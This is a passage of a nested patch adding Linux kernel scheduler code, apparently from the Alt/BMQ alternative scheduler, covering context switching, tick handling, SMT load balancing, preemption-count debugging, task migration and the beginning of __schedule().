-+		 * sys_membarrier() requires an smp_mb() between setting
-+		 * rq->curr / membarrier_switch_mm() and returning to userspace.
-+		 *
-+		 * The below provides this either through switch_mm(), or in
-+		 * case 'prev->active_mm == next->mm' through
-+		 * finish_task_switch()'s mmdrop().
-+		 */
-+		switch_mm_irqs_off(prev->active_mm, next->mm, next);
-+		lru_gen_use_mm(next->mm);
-+
-+		if (!prev->mm) {                        // from kernel
-+			/* will mmdrop() in finish_task_switch(). */
-+			rq->prev_mm = prev->active_mm;
-+			prev->active_mm = NULL;
-+		}
-+	}
-+
-+	prepare_lock_switch(rq, next);
-+
-+	/* Here we just switch the register state and the stack. */
-+	switch_to(prev, next, prev);
-+	barrier();
-+
-+	return finish_task_switch(prev);
-+}
-+
-+/*
-+ * nr_running, nr_uninterruptible and nr_context_switches:
-+ *
-+ * externally visible scheduler statistics: current number of runnable
-+ * threads, total number of context switches performed since bootup.
-+ */
-+unsigned int nr_running(void)
-+{
-+	unsigned int i, sum = 0;
-+
-+	for_each_online_cpu(i)
-+		sum += cpu_rq(i)->nr_running;
-+
-+	return sum;
-+}
-+
-+/*
-+ * Check if only the current task is running on the CPU.
-+ *
-+ * Caution: this function does not check that the caller has disabled
-+ * preemption, thus the result might have a time-of-check-to-time-of-use
-+ * race.  The caller is responsible to use it correctly, for example:
-+ *
-+ * - from a non-preemptible section (of course)
-+ *
-+ * - from a thread that is bound to a single CPU
-+ *
-+ * - in a loop with very short iterations (e.g. a polling loop)
-+ */
-+bool single_task_running(void)
-+{
-+	return raw_rq()->nr_running == 1;
-+}
-+EXPORT_SYMBOL(single_task_running);
-+
-+unsigned long long nr_context_switches(void)
-+{
-+	int i;
-+	unsigned long long sum = 0;
-+
-+	for_each_possible_cpu(i)
-+		sum += cpu_rq(i)->nr_switches;
-+
-+	return sum;
-+}
-+
-+/*
-+ * Consumers of these two interfaces, like for example the cpuidle menu
-+ * governor, are using nonsensical data. Preferring shallow idle state selection
-+ * for a CPU that has IO-wait which might not even end up running the task when
-+ * it does become runnable.
-+ */
-+
-+unsigned int nr_iowait_cpu(int cpu)
-+{
-+	return atomic_read(&cpu_rq(cpu)->nr_iowait);
-+}
-+
-+/*
-+ * IO-wait accounting, and how it's mostly bollocks (on SMP).
-+ *
-+ * The idea behind IO-wait account is to account the idle time that we could
-+ * have spend running if it were not for IO. That is, if we were to improve the
-+ * storage performance, we'd have a proportional reduction in IO-wait time.
-+ *
-+ * This all works nicely on UP, where, when a task blocks on IO, we account
-+ * idle time as IO-wait, because if the storage were faster, it could've been
-+ * running and we'd not be idle.
-+ *
-+ * This has been extended to SMP, by doing the same for each CPU. This however
-+ * is broken.
-+ *
-+ * Imagine for instance the case where two tasks block on one CPU, only the one
-+ * CPU will have IO-wait accounted, while the other has regular idle. Even
-+ * though, if the storage were faster, both could've ran at the same time,
-+ * utilising both CPUs.
-+ *
-+ * This means, that when looking globally, the current IO-wait accounting on
-+ * SMP is a lower bound, by reason of under accounting.
-+ *
-+ * Worse, since the numbers are provided per CPU, they are sometimes
-+ * interpreted per CPU, and that is nonsensical. A blocked task isn't strictly
-+ * associated with any one particular CPU, it can wake to another CPU than it
-+ * blocked on. This means the per CPU IO-wait number is meaningless.
-+ *
-+ * Task CPU affinities can make all that even more 'interesting'.
-+ */
-+
-+unsigned int nr_iowait(void)
-+{
-+	unsigned int i, sum = 0;
-+
-+	for_each_possible_cpu(i)
-+		sum += nr_iowait_cpu(i);
-+
-+	return sum;
-+}
-+
-+#ifdef CONFIG_SMP
-+
-+/*
-+ * sched_exec - execve() is a valuable balancing opportunity, because at
-+ * this point the task has the smallest effective memory and cache
-+ * footprint.
-+ */
-+void sched_exec(void)
-+{
-+}
-+
-+#endif
-+
-+DEFINE_PER_CPU(struct kernel_stat, kstat);
-+DEFINE_PER_CPU(struct kernel_cpustat, kernel_cpustat);
-+
-+EXPORT_PER_CPU_SYMBOL(kstat);
-+EXPORT_PER_CPU_SYMBOL(kernel_cpustat);
-+
-+static inline void update_curr(struct rq *rq, struct task_struct *p)
-+{
-+	s64 ns = rq->clock_task - p->last_ran;
-+
-+	p->sched_time += ns;
-+	cgroup_account_cputime(p, ns);
-+	account_group_exec_runtime(p, ns);
-+
-+	p->time_slice -= ns;
-+	p->last_ran = rq->clock_task;
-+}
-+
-+/*
-+ * Return accounted runtime for the task.
-+ * Return separately the current's pending runtime that have not been
-+ * accounted yet.
-+ */
-+unsigned long long task_sched_runtime(struct task_struct *p)
-+{
-+	unsigned long flags;
-+	struct rq *rq;
-+	raw_spinlock_t *lock;
-+	u64 ns;
-+
-+#if defined(CONFIG_64BIT) && defined(CONFIG_SMP)
-+	/*
-+	 * 64-bit doesn't need locks to atomically read a 64-bit value.
-+	 * So we have a optimization chance when the task's delta_exec is 0.
-+	 * Reading ->on_cpu is racy, but this is ok.
-+	 *
-+	 * If we race with it leaving CPU, we'll take a lock. So we're correct.
-+	 * If we race with it entering CPU, unaccounted time is 0. This is
-+	 * indistinguishable from the read occurring a few cycles earlier.
-+	 * If we see ->on_cpu without ->on_rq, the task is leaving, and has
-+	 * been accounted, so we're correct here as well.
-+	 */
-+	if (!p->on_cpu || !task_on_rq_queued(p))
-+		return tsk_seruntime(p);
-+#endif
-+
-+	rq = task_access_lock_irqsave(p, &lock, &flags);
-+	/*
-+	 * Must be ->curr _and_ ->on_rq.  If dequeued, we would
-+	 * project cycles that may never be accounted to this
-+	 * thread, breaking clock_gettime().
-+	 */
-+	if (p == rq->curr && task_on_rq_queued(p)) {
-+		update_rq_clock(rq);
-+		update_curr(rq, p);
-+	}
-+	ns = tsk_seruntime(p);
-+	task_access_unlock_irqrestore(p, lock, &flags);
-+
-+	return ns;
-+}
-+
-+/* This manages tasks that have run out of timeslice during a scheduler_tick */
-+static inline void scheduler_task_tick(struct rq *rq)
-+{
-+	struct task_struct *p = rq->curr;
-+
-+	if (is_idle_task(p))
-+		return;
-+
-+	update_curr(rq, p);
-+	cpufreq_update_util(rq, 0);
-+
-+	/*
-+	 * Tasks have less than RESCHED_NS of time slice left they will be
-+	 * rescheduled.
-+	 */
-+	if (p->time_slice >= RESCHED_NS)
-+		return;
-+	set_tsk_need_resched(p);
-+	set_preempt_need_resched();
-+}
-+
-+#ifdef CONFIG_SCHED_DEBUG
-+static u64 cpu_resched_latency(struct rq *rq)
-+{
-+	int latency_warn_ms = READ_ONCE(sysctl_resched_latency_warn_ms);
-+	u64 resched_latency, now = rq_clock(rq);
-+	static bool warned_once;
-+
-+	if (sysctl_resched_latency_warn_once && warned_once)
-+		return 0;
-+
-+	if (!need_resched() || !latency_warn_ms)
-+		return 0;
-+
-+	if (system_state == SYSTEM_BOOTING)
-+		return 0;
-+
-+	if (!rq->last_seen_need_resched_ns) {
-+		rq->last_seen_need_resched_ns = now;
-+		rq->ticks_without_resched = 0;
-+		return 0;
-+	}
-+
-+	rq->ticks_without_resched++;
-+	resched_latency = now - rq->last_seen_need_resched_ns;
-+	if (resched_latency <= latency_warn_ms * NSEC_PER_MSEC)
-+		return 0;
-+
-+	warned_once = true;
-+
-+	return resched_latency;
-+}
-+
-+static int __init setup_resched_latency_warn_ms(char *str)
-+{
-+	long val;
-+
-+	if ((kstrtol(str, 0, &val))) {
-+		pr_warn("Unable to set resched_latency_warn_ms\n");
-+		return 1;
-+	}
-+
-+	sysctl_resched_latency_warn_ms = val;
-+	return 1;
-+}
-+__setup("resched_latency_warn_ms=", setup_resched_latency_warn_ms);
-+#else
-+static inline u64 cpu_resched_latency(struct rq *rq) { return 0; }
-+#endif /* CONFIG_SCHED_DEBUG */
-+
-+/*
-+ * This function gets called by the timer code, with HZ frequency.
-+ * We call it with interrupts disabled.
-+ */
-+void scheduler_tick(void)
-+{
-+	int cpu __maybe_unused = smp_processor_id();
-+	struct rq *rq = cpu_rq(cpu);
-+	u64 resched_latency;
-+
-+	arch_scale_freq_tick();
-+	sched_clock_tick();
-+
-+	raw_spin_lock(&rq->lock);
-+	update_rq_clock(rq);
-+
-+	scheduler_task_tick(rq);
-+	if (sched_feat(LATENCY_WARN))
-+		resched_latency = cpu_resched_latency(rq);
-+	calc_global_load_tick(rq);
-+
-+	rq->last_tick = rq->clock;
-+	raw_spin_unlock(&rq->lock);
-+
-+	if (sched_feat(LATENCY_WARN) && resched_latency)
-+		resched_latency_warn(cpu, resched_latency);
-+
-+	perf_event_task_tick();
-+}
-+
-+#ifdef CONFIG_SCHED_SMT
-+static inline int sg_balance_cpu_stop(void *data)
-+{
-+	struct rq *rq = this_rq();
-+	struct task_struct *p = data;
-+	cpumask_t tmp;
-+	unsigned long flags;
-+
-+	local_irq_save(flags);
-+
-+	raw_spin_lock(&p->pi_lock);
-+	raw_spin_lock(&rq->lock);
-+
-+	rq->active_balance = 0;
-+	/* _something_ may have changed the task, double check again */
-+	if (task_on_rq_queued(p) && task_rq(p) == rq &&
-+	    cpumask_and(&tmp, p->cpus_ptr, &sched_sg_idle_mask) &&
-+	    !is_migration_disabled(p)) {
-+		int cpu = cpu_of(rq);
-+		int dcpu = __best_mask_cpu(&tmp, per_cpu(sched_cpu_llc_mask, cpu));
-+		rq = move_queued_task(rq, p, dcpu);
-+	}
-+
-+	raw_spin_unlock(&rq->lock);
-+	raw_spin_unlock(&p->pi_lock);
-+
-+	local_irq_restore(flags);
-+
-+	return 0;
-+}
-+
-+/* sg_balance_trigger - trigger slibing group balance for @cpu */
-+static inline int sg_balance_trigger(const int cpu)
-+{
-+	struct rq *rq= cpu_rq(cpu);
-+	unsigned long flags;
-+	struct task_struct *curr;
-+	int res;
-+
-+	if (!raw_spin_trylock_irqsave(&rq->lock, flags))
-+		return 0;
-+	curr = rq->curr;
-+	res = (!is_idle_task(curr)) && (1 == rq->nr_running) &&\
-+	      cpumask_intersects(curr->cpus_ptr, &sched_sg_idle_mask) &&\
-+	      !is_migration_disabled(curr) && (!rq->active_balance);
-+
-+	if (res)
-+		rq->active_balance = 1;
-+
-+	raw_spin_unlock_irqrestore(&rq->lock, flags);
-+
-+	if (res)
-+		stop_one_cpu_nowait(cpu, sg_balance_cpu_stop, curr,
-+				    &rq->active_balance_work);
-+	return res;
-+}
-+
-+/*
-+ * sg_balance - slibing group balance check for run queue @rq
-+ */
-+static inline void sg_balance(struct rq *rq)
-+{
-+	cpumask_t chk;
-+	int cpu = cpu_of(rq);
-+
-+	/* exit when cpu is offline */
-+	if (unlikely(!rq->online))
-+		return;
-+
-+	/*
-+	 * Only cpu in slibing idle group will do the checking and then
-+	 * find potential cpus which can migrate the current running task
-+	 */
-+	if (cpumask_test_cpu(cpu, &sched_sg_idle_mask) &&
-+	    cpumask_andnot(&chk, cpu_online_mask, sched_idle_mask) &&
-+	    cpumask_andnot(&chk, &chk, &sched_rq_pending_mask)) {
-+		int i;
-+
-+		for_each_cpu_wrap(i, &chk, cpu) {
-+			if (!cpumask_intersects(cpu_smt_mask(i), sched_idle_mask) &&\
-+			    sg_balance_trigger(i))
-+				return;
-+		}
-+	}
-+}
-+#endif /* CONFIG_SCHED_SMT */
-+
-+#ifdef CONFIG_NO_HZ_FULL
-+
-+struct tick_work {
-+	int			cpu;
-+	atomic_t		state;
-+	struct delayed_work	work;
-+};
-+/* Values for ->state, see diagram below. */
-+#define TICK_SCHED_REMOTE_OFFLINE	0
-+#define TICK_SCHED_REMOTE_OFFLINING	1
-+#define TICK_SCHED_REMOTE_RUNNING	2
-+
-+/*
-+ * State diagram for ->state:
-+ *
-+ *
-+ *          TICK_SCHED_REMOTE_OFFLINE
-+ *                    |   ^
-+ *                    |   |
-+ *                    |   | sched_tick_remote()
-+ *                    |   |
-+ *                    |   |
-+ *                    +--TICK_SCHED_REMOTE_OFFLINING
-+ *                    |   ^
-+ *                    |   |
-+ * sched_tick_start() |   | sched_tick_stop()
-+ *                    |   |
-+ *                    V   |
-+ *          TICK_SCHED_REMOTE_RUNNING
-+ *
-+ *
-+ * Other transitions get WARN_ON_ONCE(), except that sched_tick_remote()
-+ * and sched_tick_start() are happy to leave the state in RUNNING.
-+ */
-+
-+static struct tick_work __percpu *tick_work_cpu;
-+
-+static void sched_tick_remote(struct work_struct *work)
-+{
-+	struct delayed_work *dwork = to_delayed_work(work);
-+	struct tick_work *twork = container_of(dwork, struct tick_work, work);
-+	int cpu = twork->cpu;
-+	struct rq *rq = cpu_rq(cpu);
-+	struct task_struct *curr;
-+	unsigned long flags;
-+	u64 delta;
-+	int os;
-+
-+	/*
-+	 * Handle the tick only if it appears the remote CPU is running in full
-+	 * dynticks mode. The check is racy by nature, but missing a tick or
-+	 * having one too much is no big deal because the scheduler tick updates
-+	 * statistics and checks timeslices in a time-independent way, regardless
-+	 * of when exactly it is running.
-+	 */
-+	if (!tick_nohz_tick_stopped_cpu(cpu))
-+		goto out_requeue;
-+
-+	raw_spin_lock_irqsave(&rq->lock, flags);
-+	curr = rq->curr;
-+	if (cpu_is_offline(cpu))
-+		goto out_unlock;
-+
-+	update_rq_clock(rq);
-+	if (!is_idle_task(curr)) {
-+		/*
-+		 * Make sure the next tick runs within a reasonable
-+		 * amount of time.
-+		 */
-+		delta = rq_clock_task(rq) - curr->last_ran;
-+		WARN_ON_ONCE(delta > (u64)NSEC_PER_SEC * 3);
-+	}
-+	scheduler_task_tick(rq);
-+
-+	calc_load_nohz_remote(rq);
-+out_unlock:
-+	raw_spin_unlock_irqrestore(&rq->lock, flags);
-+
-+out_requeue:
-+	/*
-+	 * Run the remote tick once per second (1Hz). This arbitrary
-+	 * frequency is large enough to avoid overload but short enough
-+	 * to keep scheduler internal stats reasonably up to date.  But
-+	 * first update state to reflect hotplug activity if required.
-+	 */
-+	os = atomic_fetch_add_unless(&twork->state, -1, TICK_SCHED_REMOTE_RUNNING);
-+	WARN_ON_ONCE(os == TICK_SCHED_REMOTE_OFFLINE);
-+	if (os == TICK_SCHED_REMOTE_RUNNING)
-+		queue_delayed_work(system_unbound_wq, dwork, HZ);
-+}
-+
-+static void sched_tick_start(int cpu)
-+{
-+	int os;
-+	struct tick_work *twork;
-+
-+	if (housekeeping_cpu(cpu, HK_TYPE_TICK))
-+		return;
-+
-+	WARN_ON_ONCE(!tick_work_cpu);
-+
-+	twork = per_cpu_ptr(tick_work_cpu, cpu);
-+	os = atomic_xchg(&twork->state, TICK_SCHED_REMOTE_RUNNING);
-+	WARN_ON_ONCE(os == TICK_SCHED_REMOTE_RUNNING);
-+	if (os == TICK_SCHED_REMOTE_OFFLINE) {
-+		twork->cpu = cpu;
-+		INIT_DELAYED_WORK(&twork->work, sched_tick_remote);
-+		queue_delayed_work(system_unbound_wq, &twork->work, HZ);
-+	}
-+}
-+
-+#ifdef CONFIG_HOTPLUG_CPU
-+static void sched_tick_stop(int cpu)
-+{
-+	struct tick_work *twork;
-+	int os;
-+
-+	if (housekeeping_cpu(cpu, HK_TYPE_TICK))
-+		return;
-+
-+	WARN_ON_ONCE(!tick_work_cpu);
-+
-+	twork = per_cpu_ptr(tick_work_cpu, cpu);
-+	/* There cannot be competing actions, but don't rely on stop-machine. */
-+	os = atomic_xchg(&twork->state, TICK_SCHED_REMOTE_OFFLINING);
-+	WARN_ON_ONCE(os != TICK_SCHED_REMOTE_RUNNING);
-+	/* Don't cancel, as this would mess up the state machine. */
-+}
-+#endif /* CONFIG_HOTPLUG_CPU */
-+
-+int __init sched_tick_offload_init(void)
-+{
-+	tick_work_cpu = alloc_percpu(struct tick_work);
-+	BUG_ON(!tick_work_cpu);
-+	return 0;
-+}
-+
-+#else /* !CONFIG_NO_HZ_FULL */
-+static inline void sched_tick_start(int cpu) { }
-+static inline void sched_tick_stop(int cpu) { }
-+#endif
-+
-+#if defined(CONFIG_PREEMPTION) && (defined(CONFIG_DEBUG_PREEMPT) || \
-+				defined(CONFIG_PREEMPT_TRACER))
-+/*
-+ * If the value passed in is equal to the current preempt count
-+ * then we just disabled preemption. Start timing the latency.
-+ */
-+static inline void preempt_latency_start(int val)
-+{
-+	if (preempt_count() == val) {
-+		unsigned long ip = get_lock_parent_ip();
-+#ifdef CONFIG_DEBUG_PREEMPT
-+		current->preempt_disable_ip = ip;
-+#endif
-+		trace_preempt_off(CALLER_ADDR0, ip);
-+	}
-+}
-+
-+void preempt_count_add(int val)
-+{
-+#ifdef CONFIG_DEBUG_PREEMPT
-+	/*
-+	 * Underflow?
-+	 */
-+	if (DEBUG_LOCKS_WARN_ON((preempt_count() < 0)))
-+		return;
-+#endif
-+	__preempt_count_add(val);
-+#ifdef CONFIG_DEBUG_PREEMPT
-+	/*
-+	 * Spinlock count overflowing soon?
-+	 */
-+	DEBUG_LOCKS_WARN_ON((preempt_count() & PREEMPT_MASK) >=
-+				PREEMPT_MASK - 10);
-+#endif
-+	preempt_latency_start(val);
-+}
-+EXPORT_SYMBOL(preempt_count_add);
-+NOKPROBE_SYMBOL(preempt_count_add);
-+
-+/*
-+ * If the value passed in equals to the current preempt count
-+ * then we just enabled preemption. Stop timing the latency.
-+ */
-+static inline void preempt_latency_stop(int val)
-+{
-+	if (preempt_count() == val)
-+		trace_preempt_on(CALLER_ADDR0, get_lock_parent_ip());
-+}
-+
-+void preempt_count_sub(int val)
-+{
-+#ifdef CONFIG_DEBUG_PREEMPT
-+	/*
-+	 * Underflow?
-+	 */
-+	if (DEBUG_LOCKS_WARN_ON(val > preempt_count()))
-+		return;
-+	/*
-+	 * Is the spinlock portion underflowing?
-+	 */
-+	if (DEBUG_LOCKS_WARN_ON((val < PREEMPT_MASK) &&
-+			!(preempt_count() & PREEMPT_MASK)))
-+		return;
-+#endif
-+
-+	preempt_latency_stop(val);
-+	__preempt_count_sub(val);
-+}
-+EXPORT_SYMBOL(preempt_count_sub);
-+NOKPROBE_SYMBOL(preempt_count_sub);
-+
-+#else
-+static inline void preempt_latency_start(int val) { }
-+static inline void preempt_latency_stop(int val) { }
-+#endif
-+
-+static inline unsigned long get_preempt_disable_ip(struct task_struct *p)
-+{
-+#ifdef CONFIG_DEBUG_PREEMPT
-+	return p->preempt_disable_ip;
-+#else
-+	return 0;
-+#endif
-+}
-+
-+/*
-+ * Print scheduling while atomic bug:
-+ */
-+static noinline void __schedule_bug(struct task_struct *prev)
-+{
-+	/* Save this before calling printk(), since that will clobber it */
-+	unsigned long preempt_disable_ip = get_preempt_disable_ip(current);
-+
-+	if (oops_in_progress)
-+		return;
-+
-+	printk(KERN_ERR "BUG: scheduling while atomic: %s/%d/0x%08x\n",
-+		prev->comm, prev->pid, preempt_count());
-+
-+	debug_show_held_locks(prev);
-+	print_modules();
-+	if (irqs_disabled())
-+		print_irqtrace_events(prev);
-+	if (IS_ENABLED(CONFIG_DEBUG_PREEMPT)
-+	    && in_atomic_preempt_off()) {
-+		pr_err("Preemption disabled at:");
-+		print_ip_sym(KERN_ERR, preempt_disable_ip);
-+	}
-+	if (panic_on_warn)
-+		panic("scheduling while atomic\n");
-+
-+	dump_stack();
-+	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
-+}
-+
-+/*
-+ * Various schedule()-time debugging checks and statistics:
-+ */
-+static inline void schedule_debug(struct task_struct *prev, bool preempt)
-+{
-+#ifdef CONFIG_SCHED_STACK_END_CHECK
-+	if (task_stack_end_corrupted(prev))
-+		panic("corrupted stack end detected inside scheduler\n");
-+
-+	if (task_scs_end_corrupted(prev))
-+		panic("corrupted shadow stack detected inside scheduler\n");
-+#endif
-+
-+#ifdef CONFIG_DEBUG_ATOMIC_SLEEP
-+	if (!preempt && READ_ONCE(prev->__state) && prev->non_block_count) {
-+		printk(KERN_ERR "BUG: scheduling in a non-blocking section: %s/%d/%i\n",
-+			prev->comm, prev->pid, prev->non_block_count);
-+		dump_stack();
-+		add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
-+	}
-+#endif
-+
-+	if (unlikely(in_atomic_preempt_off())) {
-+		__schedule_bug(prev);
-+		preempt_count_set(PREEMPT_DISABLED);
-+	}
-+	rcu_sleep_check();
-+	SCHED_WARN_ON(ct_state() == CONTEXT_USER);
-+
-+	profile_hit(SCHED_PROFILING, __builtin_return_address(0));
-+
-+	schedstat_inc(this_rq()->sched_count);
-+}
-+
-+/*
-+ * Compile time debug macro
-+ * #define ALT_SCHED_DEBUG
-+ */
-+
-+#ifdef ALT_SCHED_DEBUG
-+void alt_sched_debug(void)
-+{
-+	printk(KERN_INFO "sched: pending: 0x%04lx, idle: 0x%04lx, sg_idle: 0x%04lx\n",
-+	       sched_rq_pending_mask.bits[0],
-+	       sched_idle_mask->bits[0],
-+	       sched_sg_idle_mask.bits[0]);
-+}
-+#else
-+inline void alt_sched_debug(void) {}
-+#endif
-+
-+#ifdef	CONFIG_SMP
-+
-+#ifdef CONFIG_PREEMPT_RT
-+#define SCHED_NR_MIGRATE_BREAK 8
-+#else
-+#define SCHED_NR_MIGRATE_BREAK 32
-+#endif
-+
-+const_debug unsigned int sysctl_sched_nr_migrate = SCHED_NR_MIGRATE_BREAK;
-+
-+/*
-+ * Migrate pending tasks in @rq to @dest_cpu
-+ */
-+static inline int
-+migrate_pending_tasks(struct rq *rq, struct rq *dest_rq, const int dest_cpu)
-+{
-+	struct task_struct *p, *skip = rq->curr;
-+	int nr_migrated = 0;
-+	int nr_tries = min(rq->nr_running / 2, sysctl_sched_nr_migrate);
-+
-+	while (skip != rq->idle && nr_tries &&
-+	       (p = sched_rq_next_task(skip, rq)) != rq->idle) {
-+		skip = sched_rq_next_task(p, rq);
-+		if (cpumask_test_cpu(dest_cpu, p->cpus_ptr)) {
-+			__SCHED_DEQUEUE_TASK(p, rq, 0);
-+			set_task_cpu(p, dest_cpu);
-+			sched_task_sanity_check(p, dest_rq);
-+			__SCHED_ENQUEUE_TASK(p, dest_rq, 0);
-+			nr_migrated++;
-+		}
-+		nr_tries--;
-+	}
-+
-+	return nr_migrated;
-+}
-+
-+static inline int take_other_rq_tasks(struct rq *rq, int cpu)
-+{
-+	struct cpumask *topo_mask, *end_mask;
-+
-+	if (unlikely(!rq->online))
-+		return 0;
-+
-+	if (cpumask_empty(&sched_rq_pending_mask))
-+		return 0;
-+
-+	topo_mask = per_cpu(sched_cpu_topo_masks, cpu) + 1;
-+	end_mask = per_cpu(sched_cpu_topo_end_mask, cpu);
-+	do {
-+		int i;
-+		for_each_cpu_and(i, &sched_rq_pending_mask, topo_mask) {
-+			int nr_migrated;
-+			struct rq *src_rq;
-+
-+			src_rq = cpu_rq(i);
-+			if (!do_raw_spin_trylock(&src_rq->lock))
-+				continue;
-+			spin_acquire(&src_rq->lock.dep_map,
-+				     SINGLE_DEPTH_NESTING, 1, _RET_IP_);
-+
-+			if ((nr_migrated = migrate_pending_tasks(src_rq, rq, cpu))) {
-+				src_rq->nr_running -= nr_migrated;
-+				if (src_rq->nr_running < 2)
-+					cpumask_clear_cpu(i, &sched_rq_pending_mask);
-+
-+				spin_release(&src_rq->lock.dep_map, _RET_IP_);
-+				do_raw_spin_unlock(&src_rq->lock);
-+
-+				rq->nr_running += nr_migrated;
-+				if (rq->nr_running > 1)
-+					cpumask_set_cpu(cpu, &sched_rq_pending_mask);
-+
-+				cpufreq_update_util(rq, 0);
-+
-+				return 1;
-+			}
-+
-+			spin_release(&src_rq->lock.dep_map, _RET_IP_);
-+			do_raw_spin_unlock(&src_rq->lock);
-+		}
-+	} while (++topo_mask < end_mask);
-+
-+	return 0;
-+}
-+#endif
-+
-+/*
-+ * Timeslices below RESCHED_NS are considered as good as expired as there's no
-+ * point rescheduling when there's so little time left.
-+ */
-+static inline void check_curr(struct task_struct *p, struct rq *rq)
-+{
-+	if (unlikely(rq->idle == p))
-+		return;
-+
-+	update_curr(rq, p);
-+
-+	if (p->time_slice < RESCHED_NS)
-+		time_slice_expired(p, rq);
-+}
-+
-+static inline struct task_struct *
-+choose_next_task(struct rq *rq, int cpu)
-+{
-+	struct task_struct *next;
-+
-+	if (unlikely(rq->skip)) {
-+		next = rq_runnable_task(rq);
-+		if (next == rq->idle) {
-+#ifdef	CONFIG_SMP
-+			if (!take_other_rq_tasks(rq, cpu)) {
-+#endif
-+				rq->skip = NULL;
-+				schedstat_inc(rq->sched_goidle);
-+				return next;
-+#ifdef	CONFIG_SMP
-+			}
-+			next = rq_runnable_task(rq);
-+#endif
-+		}
-+		rq->skip = NULL;
-+#ifdef CONFIG_HIGH_RES_TIMERS
-+		hrtick_start(rq, next->time_slice);
-+#endif
-+		return next;
-+	}
-+
-+	next = sched_rq_first_task(rq);
-+	if (next == rq->idle) {
-+#ifdef	CONFIG_SMP
-+		if (!take_other_rq_tasks(rq, cpu)) {
-+#endif
-+			schedstat_inc(rq->sched_goidle);
-+			/*printk(KERN_INFO "sched: choose_next_task(%d) idle %px\n", cpu, next);*/
-+			return next;
-+#ifdef	CONFIG_SMP
-+		}
-+		next = sched_rq_first_task(rq);
-+#endif
-+	}
-+#ifdef CONFIG_HIGH_RES_TIMERS
-+	hrtick_start(rq, next->time_slice);
-+#endif
-+	/*printk(KERN_INFO "sched: choose_next_task(%d) next %px\n", cpu,
-+	 * next);*/
-+	return next;
-+}
-+
-+/*
-+ * Constants for the sched_mode argument of __schedule().
-+ *
-+ * The mode argument allows RT enabled kernels to differentiate a
-+ * preemption from blocking on an 'sleeping' spin/rwlock. Note that
-+ * SM_MASK_PREEMPT for !RT has all bits set, which allows the compiler to
-+ * optimize the AND operation out and just check for zero.
-+ */
-+#define SM_NONE			0x0
-+#define SM_PREEMPT		0x1
-+#define SM_RTLOCK_WAIT		0x2
-+
-+#ifndef CONFIG_PREEMPT_RT
-+# define SM_MASK_PREEMPT	(~0U)
-+#else
-+# define SM_MASK_PREEMPT	SM_PREEMPT
-+#endif
-+
-+/*
-+ * schedule() is the main scheduler function.
-+ *
-+ * The main means of driving the scheduler and thus entering this function are:
-+ *
-+ *   1. Explicit blocking: mutex, semaphore, waitqueue, etc.
-+ *
-+ *   2. TIF_NEED_RESCHED flag is checked on interrupt and userspace return
-+ *      paths. For example, see arch/x86/entry_64.S.
-+ *
-+ *      To drive preemption between tasks, the scheduler sets the flag in timer
-+ *      interrupt handler scheduler_tick().
-+ *
-+ *   3. Wakeups don't really cause entry into schedule(). They add a
-+ *      task to the run-queue and that's it.
-+ *
-+ *      Now, if the new task added to the run-queue preempts the current
-+ *      task, then the wakeup sets TIF_NEED_RESCHED and schedule() gets
-+ *      called on the nearest possible occasion:
-+ *
-+ *       - If the kernel is preemptible (CONFIG_PREEMPTION=y):
-+ *
-+ *         - in syscall or exception context, at the next outmost
-+ *           preempt_enable(). (this might be as soon as the wake_up()'s
-+ *           spin_unlock()!)
-+ *
-+ *         - in IRQ context, return from interrupt-handler to
-+ *           preemptible context
-+ *
-+ *       - If the kernel is not preemptible (CONFIG_PREEMPTION is not set)
-+ *         then at the next:
-+ *
-+ *          - cond_resched() call
-+ *          - explicit schedule() call
-+ *          - return from syscall or exception to user-space
-+ *          - return from interrupt-handler to user-space
-+ *
-+ * WARNING: must be called with preemption disabled!
-+ */
-+static void __sched notrace __schedule(unsigned int sched_mode)
-+{
-+	struct task_struct *prev, *next;
-+	unsigned long *switch_count;
-+	unsigned long prev_state;
-+	struct rq *rq;
-+	int cpu;
-+	int deactivated = 0;
-+
-+	cpu = smp_processor_id();
-+	rq = cpu_rq(cpu);
-+	prev = rq->curr;
-+
-+	schedule_debug(prev, !!sched_mode);
-+
-+	/* by passing sched_feat(HRTICK) checking which Alt schedule FW doesn't support */
-+	hrtick_clear(rq);
-+
-+	local_irq_disable();
-+	rcu_note_context_switch(!!sched_mode);
-+
-+	/*
-+	 * Make sure that signal_pending_state()->signal_pending() below
-+	 * can't be reordered with __set_current_state(TASK_INTERRUPTIBLE)
-+	 * done by the caller to avoid the race with signal_wake_up():
-+	 *
-+	 * __set_current_state(@state)		signal_wake_up()
-+	 * schedule()				  set_tsk_thread_flag(p, TIF_SIGPENDING)
-+	 *					  wake_up_state(p, state)
-+	 *   LOCK rq->lock			    LOCK p->pi_state
-+	 *   smp_mb__after_spinlock()		    smp_mb__after_spinlock()
-+	 *     if (signal_pending_state())	    if (p->state & @state)
-+	 *
-+	 * Also, the membarrier system call requires a full memory barrier
-+	 * after coming from user-space, before storing to rq->curr.
-+	 */
-+	raw_spin_lock(&rq->lock);
-+	smp_mb__after_spinlock();
-+
-+	update_rq_clock(rq);
-+
-+	switch_count = &prev->nivcsw;
-+	/*
-+	 * We must load prev->state once (task_struct::state is volatile), such
-+	 * that we form a control dependency vs deactivate_task() below.
-+	 */
-+	prev_state = READ_ONCE(prev->__state);
-+	if (!(sched_mode & SM_MASK_PREEMPT) && prev_state) {
-+		if (signal_pending_state(prev_state, prev)) {
-+			WRITE_ONCE(prev->__state, TASK_RUNNING);
-+		} else {
-+			prev->sched_contributes_to_load =
-+				(prev_state & TASK_UNINTERRUPTIBLE) &&
-+				!(prev_state & TASK_NOLOAD) &&
-+				!(prev_state & TASK_FROZEN);
-+
-+			if (prev->sched_contributes_to_load)
-+				rq->nr_uninterruptible++;
-+
-+			/*
-+			 * __schedule()			ttwu()
-+			 *   prev_state = prev->state;    if (p->on_rq && ...)
-+			 *   if (prev_state)		    goto out;
-+			 *     p->on_rq = 0;		  smp_acquire__after_ctrl_dep();
-+			 *				  p->state = TASK_WAKING
-+			 *
-+			 * Where __schedule() and ttwu() have matching control dependencies.
-+			 *
-+			 * After this, schedule() must not care about p->state any more.
-+			 */
-+			sched_task_deactivate(prev, rq);
-+			deactivate_task(prev, rq);
-+			deactivated = 1;
-+
-+			if (prev->in_iowait) {
-+				atomic_inc(&rq->nr_iowait);
-+				delayacct_blkio_start();
-+			}
-+		}
-+		switch_count = &prev->nvcsw;
-+	}
-+
-+	check_curr(prev, rq);
-+
-+	next = choose_next_task(rq, cpu);
-+	clear_tsk_need_resched(prev);
-+	clear_preempt_need_resched();
